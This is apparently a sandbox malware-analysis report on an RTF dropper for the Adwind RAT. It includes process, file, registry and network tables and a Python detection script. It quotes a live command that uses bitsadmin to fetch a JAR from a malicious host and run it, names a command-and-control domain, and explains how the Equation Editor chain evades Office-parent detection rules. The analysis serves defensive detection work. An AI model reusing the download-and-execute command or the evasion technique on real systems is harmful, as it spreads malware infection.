| File name | BQZEMN.rtf |
|---|---|
| Full analysis | https://app.any.run/tasks/df5ea61c-d37f-4ccb-9047-ab538f120e0c |
| Verdict | Malicious activity |
| Threats | Adwind RAT (also known as Unrecom, Sockrat, Frutas, jRat and JSocket) is a Malware-as-a-Service Remote Access Trojan that attackers use to collect information from infected machines. It was one of the most popular RATs on the market in 2015. |
| Analysis date | February 18, 2019, 10:51:55 |
| OS | Windows 7 Professional Service Pack 1 (build 7601, 32-bit) |
| Tags | — |
| Indicators | — |
| MIME | text/rtf |
| File info | Rich Text Format data, version 1, ANSI |
| MD5 | FAE6C74C184AC3FFA7BEC8EA0C527567 |
| SHA1 | 6F6A59FBB69774E310C4B0D5E2D41F6CF0C11AFA |
| SHA256 | 0D01A9C923C6DE7882165195F8F451A574DE9FE209AC543B3E1E78ED515114BF |
| SSDEEP | 96:MO3c/Y/UG5VoWx2TeNMyRFVSB+EqykjfND8t0xm1y4hF/0Zr1N9KQ:MY/UGZxjDVSz+cQWZv0ZBN8Q |
| File type | .rtf: Rich Text Format (100) |
| PID | CMD | Path | Indicators | Parent process | Details |
|---|---|---|---|---|---|
| 2944 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\BQZEMN.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
| 3212 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | — | svchost.exe | User: admin; Company: Design Science, Inc.; Integrity Level: MEDIUM; Description: Microsoft Equation Editor; Exit code: 0; Version: 00110900 |
| 3884 | cmd.exe /c bitsadmin /transfer 8 /download http://www.m8life.by/img/8/doc.jar %temp%\Io.Jar&%temp%\Io.Jar | C:\Windows\system32\cmd.exe | — | EQNEDT32.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 2304 | bitsadmin /transfer 8 /download http://www.m8life.by/img/8/doc.jar C:\Users\admin\AppData\Local\Temp\Io.Jar | C:\Windows\system32\bitsadmin.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: BITS administration utility; Exit code: 0; Version: 7.5.7600.16385 (win7_rtm.090713-1255) |
| 3040 | "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\Io.Jar" | C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe | — | cmd.exe | User: admin; Company: Oracle Corporation; Integrity Level: MEDIUM; Description: Java(TM) Platform SE binary; Exit code: 0; Version: 8.0.920.14 |
| 2604 | "C:\Program Files\Java\jre1.8.0_92\bin\java.exe" -jar C:\Users\admin\AppData\Local\Temp\_0.42440904394910172865338082849278507.class | C:\Program Files\Java\jre1.8.0_92\bin\java.exe | — | javaw.exe | User: admin; Company: Oracle Corporation; Integrity Level: MEDIUM; Description: Java(TM) Platform SE binary; Version: 8.0.920.14 |
| 2120 | cmd.exe /C cscript.exe C:\Users\admin\AppData\Local\Temp\Retrive8926773730017695811.vbs | C:\Windows\system32\cmd.exe | — | java.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 2712 | cscript.exe C:\Users\admin\AppData\Local\Temp\Retrive8926773730017695811.vbs | C:\Windows\system32\cscript.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Console Based Script Host; Exit code: 0; Version: 5.8.7600.16385 |
| 2512 | cmd.exe /C cscript.exe C:\Users\admin\AppData\Local\Temp\Retrive3778368214273123426.vbs | C:\Windows\system32\cmd.exe | — | java.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 3132 | cscript.exe C:\Users\admin\AppData\Local\Temp\Retrive3778368214273123426.vbs | C:\Windows\system32\cscript.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Console Based Script Host; Exit code: 0; Version: 5.8.7600.16385 |
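The process table is the detection-relevant part of this report, and it has one trap: EQNEDT32.EXE is not a child of WINWORD.EXE. Word activates Equation Editor as an out-of-process COM server, so DCOM starts it under svchost.exe with the `-Embedding` switch, and a rule that looks for Office spawning cmd.exe never fires. The chain that does stand out is EQNEDT32.EXE spawning cmd.exe, bitsadmin pulling a URL, java/javaw running a `-jar` from %TEMP% (the second stage is a JAR named with a `.class` extension), and java.exe reaching cscript.exe through a `cmd.exe /C` hop. The script below is an added example for this page, not ANY.RUN tooling: it rebuilds the process tree from event records constructed by hand from the table above (PID, parent PID, parent image, image, command line; parents not listed in the table, explorer.exe and svchost.exe, get ppid 0) and runs those four checks over it. The rule names are mine.

```python
"""Process-chain detection over the process table above.

Added example for this page, not ANY.RUN's own tooling. EVENTS is constructed
by hand from the table (PID, parent PID, parent image, image, command line);
the rule names are mine. Parents that are not themselves listed in the table
(explorer.exe, svchost.exe) get ppid 0, meaning "unknown".
"""
import re
from collections import defaultdict
from dataclasses import dataclass

JAVA = {"java.exe", "javaw.exe"}
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\|%temp%", re.IGNORECASE)
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
JAR_ARG_RE = re.compile(r'-jar\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    parent_image: str
    image: str
    cmdline: str


# Constructed from the process table above; command lines copied as listed.
EVENTS = [
    ProcEvent(2944, 0, "explorer.exe", "WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\BQZEMN.rtf"'),
    ProcEvent(3212, 0, "svchost.exe", "EQNEDT32.EXE",
              r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'),
    ProcEvent(3884, 3212, "EQNEDT32.EXE", "cmd.exe",
              r"cmd.exe /c bitsadmin /transfer 8 /download http://www.m8life.by/img/8/doc.jar %temp%\Io.Jar&%temp%\Io.Jar"),
    ProcEvent(2304, 3884, "cmd.exe", "bitsadmin.exe",
              r"bitsadmin /transfer 8 /download http://www.m8life.by/img/8/doc.jar C:\Users\admin\AppData\Local\Temp\Io.Jar"),
    ProcEvent(3040, 3884, "cmd.exe", "javaw.exe",
              r'"C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\Io.Jar"'),
    ProcEvent(2604, 3040, "javaw.exe", "java.exe",
              r'"C:\Program Files\Java\jre1.8.0_92\bin\java.exe" -jar C:\Users\admin\AppData\Local\Temp\_0.42440904394910172865338082849278507.class'),
    ProcEvent(2120, 2604, "java.exe", "cmd.exe",
              r"cmd.exe /C cscript.exe C:\Users\admin\AppData\Local\Temp\Retrive8926773730017695811.vbs"),
    ProcEvent(2712, 2120, "cmd.exe", "cscript.exe",
              r"cscript.exe C:\Users\admin\AppData\Local\Temp\Retrive8926773730017695811.vbs"),
    ProcEvent(2512, 2604, "java.exe", "cmd.exe",
              r"cmd.exe /C cscript.exe C:\Users\admin\AppData\Local\Temp\Retrive3778368214273123426.vbs"),
    ProcEvent(3132, 2512, "cmd.exe", "cscript.exe",
              r"cscript.exe C:\Users\admin\AppData\Local\Temp\Retrive3778368214273123426.vbs"),
]


def ancestors(pid, events):
    """Parent image names walking upward, nearest first. Stops at a PID that is
    not in the table, so here the chain ends at EQNEDT32.EXE (parent svchost)."""
    by_pid = {e.pid: e for e in events}
    chain, cur = [], by_pid.get(pid)
    while cur is not None and cur.ppid in by_pid:
        cur = by_pid[cur.ppid]
        chain.append(cur.image.lower())
    return chain


def jar_target(cmdline):
    """Path given to -jar, quoted or not; None if the command has no -jar."""
    m = JAR_ARG_RE.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None


def detect(events):
    """Apply the rules and return {rule_name: sorted list of matching PIDs}."""
    hits = defaultdict(set)
    for e in events:
        img, parent, low = e.image.lower(), e.parent_image.lower(), e.cmdline.lower()
        # Equation Editor is a COM server that DCOM starts under svchost.exe
        # ("-Embedding"), so a WINWORD->cmd.exe rule misses this chain; key on
        # EQNEDT32 as the *parent* instead: it has no business spawning anything.
        if parent == "eqnedt32.exe":
            hits["equation_editor_spawns_child"].add(e.pid)
        # bitsadmin /transfer with a URL on the command line: LOLBin download.
        if "bitsadmin" in low and "/transfer" in low and URL_RE.search(e.cmdline):
            hits["bitsadmin_url_download"].add(e.pid)
        # Java launching a JAR that lives in the user's Temp folder.
        target = jar_target(e.cmdline) if img in JAVA else None
        if target and TEMP_RE.search(target):
            hits["java_jar_from_temp"].add(e.pid)
            # -jar accepts any ZIP regardless of its name; here the second
            # stage is a JAR carrying a .class extension.
            if not target.lower().endswith(".jar"):
                hits["jar_extension_mismatch"].add(e.pid)
        # Script host running a .vbs from Temp with a JVM anywhere up the chain;
        # the cmd.exe /C hop hides the direct java.exe -> cscript.exe link.
        if (img in SCRIPT_HOSTS and ".vbs" in low and TEMP_RE.search(e.cmdline)
                and JAVA & set(ancestors(e.pid, events))):
            hits["java_descendant_runs_vbs_from_temp"].add(e.pid)
    return {rule: sorted(pids) for rule, pids in hits.items()}


if __name__ == "__main__":
    for rule, pids in detect(EVENTS).items():
        print(f"{rule}: {pids}")
```

Run against the table, `equation_editor_spawns_child` fires on 3884 alone, `bitsadmin_url_download` on 2304 and the cmd.exe that wrapped it, `java_jar_from_temp` on both JVMs, `jar_extension_mismatch` on 2604, and the script-host rule on 2712 and 3132 because `ancestors()` sees java.exe two hops up. Two processes that appear later in this report, xcopy.exe (PID 2724, in the file table) and a second javaw.exe (PID 4068, in the network table), are missing from the process table, so no rule here can cover them; on a real endpoint the same checks would run over the full Sysmon or EDR process stream rather than a sandbox excerpt.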
| PID | Process | Operation | Key | Name | Value |
|---|---|---|---|---|---|
| 2944 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | `fk,` | 666B2C00800B0000010000000000000000000000 |
| 2944 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | 1033 | Off |
| 2944 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | 1033 | On |
| 2944 | WINWORD.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | WORDFiles | 1313996823 |
| 2944 | WINWORD.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | ProductFiles | 1313996944 |
| 2944 | WINWORD.EXE | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage | ProductFiles | 1313996945 |
| 2944 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word | MTTT | 800B0000A84A970078C7D40100000000 |
| 2944 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | `l,` | 7F6C2C00800B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 |
| 2944 | WINWORD.EXE | delete value | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | `l,` | (same value as the write above) |
| 2944 | WINWORD.EXE | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0 |

All registry activity in this run comes from WINWORD.EXE itself; none of the later stages (cmd.exe, bitsadmin, the two JVMs, cscript) touches the registry in the captured window, so there is no registry persistence to pull from this report. The `l,` value under Resiliency\StartupItems is Word's own resiliency bookkeeping: its tail is the UTF-16LE string `>C:\Users\admin\AppData\Roaming\Microsoft\Templates\Normal.dotm`, written while the startup template loads and deleted once loading completes, so the write/delete pair is normal behaviour rather than an attacker artifact.
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE766.tmp.cvr | — | — | — |
| 2604 | java.exe | C:\Users\admin\AppData\Local\Temp\Retrive8926773730017695811.vbs | — | — | — |
| 2944 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | D512D016B6D8FC09C9D73080393CD633 | E12CC561D707114629B3DAA016753E27BBF4954359B14694E71C0926457DABF5 |
| 2604 | java.exe | C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp | text | D69A6AE627157E99E223C345F7A6B742 | EB0565B43D783867CAE7A9E5E0B589C95C6AA61EDE933C5446D974D09C5B2043 |
| 2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$BQZEMN.rtf | pgc | D2AB2A903CF6A450A8AC8F255538C3E3 | 5181492AF9C4BDB0D12F4D9B06E78F45009812DB48FD940F8B9BA83456E665A3 |
| 3040 | javaw.exe | C:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp | text | 5E00D07E8BA8965ADAB4A4BBC9DE0963 | 8C3B9BD1FCA473217E8E98E8DB870374FC490B6BF9EC7B406FE5D0B5688529C3 |
| 2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DCB71280.wmf | wmf | 975B76E8E77D57CC386AF977A08B1E31 | 8D80E9B9B39CD00F3BFADB3B2538DC46845FE8D0E7854D5DD9C9C381150DEDAD |
| 3040 | javaw.exe | C:\Users\admin\AppData\Local\Temp\_0.42440904394910172865338082849278507.class | java | 781FB531354D6F291F1CCAB48DA6D39F | 97D585B6AFF62FB4E43E7E6A5F816DCD7A14BE11A88B109A9BA9E8CD4C456EB9 |
| 2724 | xcopy.exe | C:\Users\admin\AppData\Roaming\Oracle\bin\deploy.dll | executable | 720EDC1469525DFCD3AE211E653D0241 | BFF79FB05667992CC2BDA9BAE6E5A301BAF553042F952203641CCD7E1FC4552D |
| 2724 | xcopy.exe | C:\Users\admin\AppData\Roaming\Oracle\README.txt | text | 0F1123976B959AC5E8B89EB8C245C4BD | 963095CF8DB76FB8071FD19A3110718A42F2AB42B27A3ADFD9EC58981C3E88D2 |

Two things to note when pulling indicators from this table. The dropped second stage, `_0.42440904394910172865338082849278507.class`, is typed `java` and is the file java.exe (PID 2604) runs with `-jar`, so hash it as a JAR, not a class file. xcopy.exe (PID 2724) does not appear in the process table above, yet it is the writer of `deploy.dll` and `README.txt` under `%APPDATA%\Oracle`, which is consistent with Adwind copying the installed JRE into a folder it controls; the `Retrive*.vbs` files in Temp are written by java.exe without a recorded hash, so they cannot be matched on content from this report alone.
| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| — | — | HEAD | 200 | 93.125.99.123:80 | http://www.m8life.by/img/8/doc.jar | BY | — | — | malicious |
| — | — | GET | 206 | 93.125.99.123:80 | http://www.m8life.by/img/8/doc.jar | BY | binary | 5.14 Kb | malicious |
| — | — | GET | 206 | 93.125.99.123:80 | http://www.m8life.by/img/8/doc.jar | BY | binary | 5.13 Kb | malicious |
| — | — | GET | 206 | 93.125.99.123:80 | http://www.m8life.by/img/8/doc.jar | BY | binary | 11.1 Kb | malicious |
| — | — | GET | 206 | 93.125.99.123:80 | http://www.m8life.by/img/8/doc.jar | BY | binary | 23.1 Kb | malicious |
| — | — | GET | 206 | 93.125.99.123:80 | http://www.m8life.by/img/8/doc.jar | BY | java | 4.51 Kb | malicious |
| — | — | GET | 206 | 93.125.99.123:80 | http://www.m8life.by/img/8/doc.jar | BY | binary | 94.7 Kb | malicious |
| — | — | GET | 206 | 93.125.99.123:80 | http://www.m8life.by/img/8/doc.jar | BY | binary | 46.9 Kb | malicious |
| — | — | GET | 206 | 93.125.99.123:80 | http://www.m8life.by/img/8/doc.jar | BY | binary | 190 Kb | malicious |
| — | — | GET | 206 | 93.125.99.123:80 | http://www.m8life.by/img/8/doc.jar | BY | binary | 255 Kb | malicious |

The one HEAD followed by nine GET requests answered with 206 Partial Content is a single download, not nine: BITS first asks for the object size and then fetches it with Range requests, so each row is one chunk of doc.jar and the sizes are chunk sizes. The PID and Process columns are empty because the transfer is performed by the BITS service on behalf of bitsadmin (PID 2304), not by the process that requested it; network telemetry keyed on the requesting process will attribute this traffic to svchost.exe.
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4068 | javaw.exe | 91.192.100.57:5656 | sukepatel101.ddns.net | SOFTplus Entwicklungen GmbH | CH | malicious |
— | — | 93.125.99.123:80 | www.m8life.by | Republican Unitary Telecommunication Enterprise Beltelecom | BY | malicious |
| Domain | IP | Reputation |
|---|---|---|
| www.m8life.by | 93.125.99.123 | malicious |
| sukepatel101.ddns.net | 91.192.100.57 | malicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET INFO JAR Size Under 30K Size - Potentially Hostile |
4068 | javaw.exe | A Network Trojan was detected | ET TROJAN [PTsecurity] Fake SSL Certificate Observed (Oracle America) |
4068 | javaw.exe | A Network Trojan was detected | ET TROJAN [PTsecurity] Fake SSL Certificate Observed (Oracle America) |